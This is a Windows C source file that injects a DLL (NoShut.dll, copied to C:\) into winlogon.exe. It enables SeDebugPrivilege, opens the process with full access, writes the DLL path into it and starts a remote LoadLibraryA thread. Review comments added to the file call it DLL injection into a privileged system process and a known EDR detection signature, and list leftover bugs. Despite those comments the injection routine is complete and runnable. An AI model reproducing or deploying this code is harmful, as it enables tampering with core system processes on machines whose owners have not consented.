#define EXENAME "winlogon.exe"
#define DLLNAME "C:\\NoShutDLL.dll"
//作者Flyue qq: 406088125 转载时请注明
#include <windows.h>
#include <stdio.h>
#include <TLHELP32.H>
DWORD ProcessNameToPId(LPCTSTR lpszProcess);
BOOL UpPrivilege(HANDLE hprocess, LPCTSTR lpname);
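/*
 * Enable the named privilege (the caller passes SE_DEBUG_NAME) on the access
 * token of hprocess.
 *
 * Fixes relative to the original:
 *  - OpenProcessToken and LookupPrivilegeValue results are checked instead of
 *    feeding an uninitialised hToken/luid into AdjustTokenPrivileges.
 *  - AdjustTokenPrivileges returns non-zero even when the privilege is not
 *    held by the token; that case sets ERROR_NOT_ALL_ASSIGNED and is now
 *    reported as failure.
 *  - The token handle is closed on every path (it leaked before).
 *
 * Returns TRUE only when the privilege was actually enabled. Enabling
 * SeDebugPrivilege is a high-value event that endpoint monitoring commonly
 * audits; it should only be done by tooling that genuinely needs it.
 */
BOOL UpPrivilege(HANDLE hprocess, LPCTSTR lpname) // raise process privilege (debug)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES Privileges;
    LUID luid;
    BOOL enabled = FALSE;

    if (!OpenProcessToken(hprocess, TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        return FALSE;
    }
    if (!LookupPrivilegeValue(NULL, lpname, &luid)) {
        goto out;
    }

    Privileges.PrivilegeCount = 1;
    Privileges.Privileges[0].Luid = luid;
    Privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    /* A non-zero return alone is not success: the call also "succeeds" with
     * ERROR_NOT_ALL_ASSIGNED when the token does not hold the privilege. */
    if (AdjustTokenPrivileges(hToken, FALSE, &Privileges, 0, NULL, NULL) &&
        GetLastError() != ERROR_NOT_ALL_ASSIGNED) {
        enabled = TRUE;
    }

out:
    CloseHandle(hToken);
    return enabled;
}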
/*
 * Program entry point.
 *
 * What the visible code does, in order:
 *  1. Copies "NoShut.dll" from the working directory to DLLNAME (C:\NoShutDLL.dll).
 *  2. Enables SE_DEBUG_NAME on the current process via UpPrivilege().
 *  3. Resolves the PID of EXENAME ("winlogon.exe") with ProcessNameToPId().
 *  4. Opens that process with PROCESS_ALL_ACCESS, allocates a buffer in it,
 *     writes the DLL path there and starts a remote thread whose start
 *     routine is the local address of LoadLibraryA.
 *
 * Security review: this is DLL injection into a privileged system process.
 * The sequence (SeDebugPrivilege enablement, PROCESS_ALL_ACCESS handle to
 * winlogon.exe, cross-process CreateRemoteThread) is a well-known detection
 * signature for EDR/AV and Sysmon-style telemetry, and code of this shape has
 * no place in production software.
 *
 * Defects left as-is in this block (documentation only):
 *  - CopyFile's return value is ignored.
 *  - OpenProcess's return value is not checked; a NULL hProcess is passed on
 *    to VirtualAllocEx.
 *  - CreateRemoteThread's return value is never checked, yet "Success!" is
 *    shown unconditionally; hThread and hProcess are never closed.
 */
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
/* Return value unchecked: a failed copy still proceeds to inject a path that
 * may not exist. */
CopyFile("NoShut.dll", DLLNAME, FALSE);
char privilege[] = SE_DEBUG_NAME;
HANDLE hprocess;
hprocess = GetCurrentProcess();
if(!UpPrivilege(hprocess, privilege)) // begin privilege elevation
{
MessageBox(0, "UpPrivilege Error!", 0, MB_OK | MB_ICONERROR);
return 1;
}
char File_Name[MAX_PATH] = {0};
sprintf(File_Name, "%s", EXENAME);
DWORD ProcessPid = ProcessNameToPId(File_Name); // get the process PID from its image name
if(ProcessPid == 0)
{
MessageBox(0, "Not Find This File", 0, MB_OK | MB_ICONERROR);
return 1;
}
/* NOTE(review): hProcess is not checked for NULL before use below. */
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessPid);
DWORD dwSize;
char DllName[MAX_PATH];
sprintf(DllName, "%s", DLLNAME);
dwSize = strlen(DllName);
LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
if(lpBuf == NULL)
{
MessageBox(0, "VirtualAllocEx Error", 0, MB_OK | MB_ICONERROR);
CloseHandle(hProcess);
return 1;
}
if(!WriteProcessMemory(hProcess, lpBuf, DllName, dwSize, NULL))
{
MessageBox(0, "WriteProcessMemory Error", 0, MB_OK | MB_ICONERROR);
CloseHandle(hProcess);
return 1;
}
/* Local address of LoadLibraryA is used as the remote thread's start
 * routine; lpBuf (the DLL path) is passed as its single argument. */
LPVOID pFunc = LoadLibraryA;
HANDLE hThread = CreateRemoteThread(hProcess,
NULL,
0,
(LPTHREAD_START_ROUTINE)pFunc,
lpBuf,
0,
NULL);
/* NOTE(review): hThread is not checked; this message is shown even when the
 * remote thread could not be created. hThread/hProcess are leaked. */
MessageBox(0, "Success!", "OK", MB_OK | MB_ICONINFORMATION);
return 0;
}
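/*
 * Look up the PID of the first running process whose image name equals
 * lpszProcess (case-sensitive strcmp, as in the original).
 *
 * Fixes relative to the original:
 *  - The Toolhelp snapshot handle is closed on every path; it leaked before.
 *  - CreateToolhelp32Snapshot failure (INVALID_HANDLE_VALUE) is handled
 *    before the handle is used.
 *  - The entry returned by Process32First is compared too; the original
 *    skipped it and only inspected entries from Process32Next onward.
 *
 * Returns the PID, or 0 when the snapshot fails or no process matches.
 */
DWORD ProcessNameToPId(LPCTSTR lpszProcess)
{
    DWORD pid = 0;
    PROCESSENTRY32 pe32;
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }

    /* dwSize must be set before the first Process32First call. */
    pe32.dwSize = sizeof(pe32);
    if (Process32First(snapshot, &pe32)) {
        do {
            if (strcmp(pe32.szExeFile, lpszProcess) == 0) {
                pid = pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(snapshot, &pe32));
    }

    CloseHandle(snapshot);
    return pid;
}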